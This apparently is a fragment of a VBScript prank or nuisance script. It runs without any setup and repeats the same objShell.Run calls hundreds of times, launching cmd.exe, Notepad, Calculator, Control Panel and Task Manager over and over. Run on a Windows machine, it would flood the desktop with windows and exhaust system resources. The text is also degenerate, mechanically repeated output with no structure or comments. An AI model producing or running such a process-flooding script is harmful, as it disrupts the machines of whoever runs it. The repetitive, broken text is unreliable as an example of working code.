objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
